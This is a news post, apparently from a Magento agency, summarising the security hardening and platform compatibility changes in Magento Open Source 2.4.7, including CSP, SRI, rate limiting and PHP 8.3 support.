All news

Security enhancements in Magento Open Source 2.4.7

Magento Open Source version 2.4.7 introduces support for PHP 8.3 and includes hundreds of quality improvements, custom attributes in GraphQL, and compatibility with FedEx and UPS services.

Magento update 2.4.7
Magento update 2.4.7
Magento update 2.4.7

Security Improvements

This release includes the same security fixes and platform improvements as Adobe Commerce 2.4.6-p5, 2.4.5-p7, and 2.4.4-p8. Although there have been no confirmed attacks to date, certain vulnerabilities could potentially be exploited to gain access to customer information or take over admin sessions. Most of these issues require an attacker to first gain access to the admin area. Therefore, it is essential to protect your admin area by, among other things:

  • IP whitelisting

  • Two-factor authentication

  • Using a VPN

  • Using a unique location instead of /admin

  • Good password practices

Additional Security Improvements
  • Changes to cache keys: Non-generated cache keys for blocks now include prefixes that differ from automatically generated keys. These keys can now only contain letters, numbers, hyphens (-), and underscores (_).

  • Limit on automatically generated discount codes: There is now a limit of 250,000 on the number of automatically generated discount codes. Merchants can adjust this limit via the new configuration option ‘Code Quantity Limit’ (Stores > Settings:Configuration > Customers > Promotions).

  • Optimization of default Admin URL generation: The generation of the default Admin URL has been optimized for increased randomness, making it less predictable.

  • New configuration setting for full-page cache: A new setting helps mitigate the risks associated with the endpoint {BASE-URL}/page_cache/block/esi. The default value is 100, but merchants can adjust this via the Admin (Stores > Settings:Configuration > System > Full Page Cache > Handles params size).

  • Support for Subresource Integrity (SRI): To comply with PCI 4.0 requirements, SRI support has been added for all JavaScript files on payment pages. Merchants can extend this configuration to other pages.

  • Changes in Content Security Policy (CSP): Updates and improvements have been made to the CSPs to comply with PCI 4.0 requirements. The default CSP configuration for payment pages is now ‘restrict mode’. For all other pages, the default configuration is ‘report-only mode’.

  • Rate limiting for payment information via REST and GraphQL APIs: Merchants can now configure rate limiting for payment information sent via REST and GraphQL, which helps prevent carding attacks.

  • Change in the behavior of the isEmailAvailable API: By default, this API now always returns ‘true’. Merchants can enable the original behavior by setting the option ‘Enable Guest Checkout Login’ in the Admin to ‘yes’, but this may expose customer information to unauthenticated users.


Platform Improvements
  • Compatibility with PHP 8.3: This release introduces support for PHP 8.3. Magento Open Source now supports both PHP 8.3 and 8.2. PHP 8.2 will be supported until December 2025. After that date, migration to PHP 8.3 is recommended.

  • Support for RabbitMQ 3.13: This release is compatible with RabbitMQ 3.13. While compatibility with RabbitMQ 3.11 and 3.12 is maintained, using version 3.13 is recommended.

  • Compatibility with Composer 2.7.x: Compatibility with Composer 2.2.x is retained.

  • Support for Varnish Cache 7.4: This release is compatible with Varnish Cache 7.4. While compatibility with versions 6.0.x and 7.2.x is maintained, using version 7.4 or version 6.0 LTS is recommended.

  • Compatibility with Elasticsearch 8.11 and OpenSearch 2.12 and 1.3: This release supports these versions.

  • Support for Redis 7.2: This release is compatible with Redis 7.2.

  • Replacing extjs with jsTree: The extjs library has been replaced with the latest version of jsTree.

  • Removal of jquery/fileUpload library: This library has been removed.

  • Update of JavaScript libraries and NPM dependencies: All JavaScript libraries and NPM dependencies in the core code of Magento Open Source have been updated to the latest available versions.

  • Update of Laminas library dependencies: All Laminas library dependencies have been updated to the latest versions compatible with PHP 8.3.

See all release notes at magento.com

Written by

Mike
Mike

Mike

on

Nov 26, 2024

We have done this before

More news.

Mike

/

Apr 23, 2025

Magento Hyvä, also for your B2B portal or webshop.

A Hyvä B2B commerce front-end is even faster in loading times, smoother in development, but above all, ready for the future. Do you want to know if Hyvä is something for you? Read on quickly and discover.

Good

Magento B2B

Mike

/

Apr 23, 2025

Magento Hyvä, also for your B2B portal or webshop.

A Hyvä B2B commerce front-end is even faster in loading times, smoother in development, but above all, ready for the future. Do you want to know if Hyvä is something for you? Read on quickly and discover.

Good

Magento B2B

Mike

/

Apr 23, 2025

Magento Hyvä, also for your B2B portal or webshop.

A Hyvä B2B commerce front-end is even faster in loading times, smoother in development, but above all, ready for the future. Do you want to know if Hyvä is something for you? Read on quickly and discover.

Good

Magento B2B

Mike

/

Apr 23, 2025

Magento Hyvä, also for your B2B portal or webshop.

A Hyvä B2B commerce front-end is even faster in loading times, smoother in development, but above all, ready for the future. Do you want to know if Hyvä is something for you? Read on quickly and discover.

Good

Magento B2B

Maarten

/

Feb 14, 2025

Department at the Webwinkel Vakdagen 2025

On April 2 & 3, we will be at the WWVD fair in Utrecht! Visit us at booth 903 and discover why Epartment is the Magento specialist for wholesalers looking to optimize their B2B e-commerce platform.

Events

Maarten

/

Feb 14, 2025

Department at the Webwinkel Vakdagen 2025

On April 2 & 3, we will be at the WWVD fair in Utrecht! Visit us at booth 903 and discover why Epartment is the Magento specialist for wholesalers looking to optimize their B2B e-commerce platform.

Events

Maarten

/

Feb 14, 2025

Department at the Webwinkel Vakdagen 2025

On April 2 & 3, we will be at the WWVD fair in Utrecht! Visit us at booth 903 and discover why Epartment is the Magento specialist for wholesalers looking to optimize their B2B e-commerce platform.

Events

Maarten

/

Feb 14, 2025

Department at the Webwinkel Vakdagen 2025

On April 2 & 3, we will be at the WWVD fair in Utrecht! Visit us at booth 903 and discover why Epartment is the Magento specialist for wholesalers looking to optimize their B2B e-commerce platform.

Events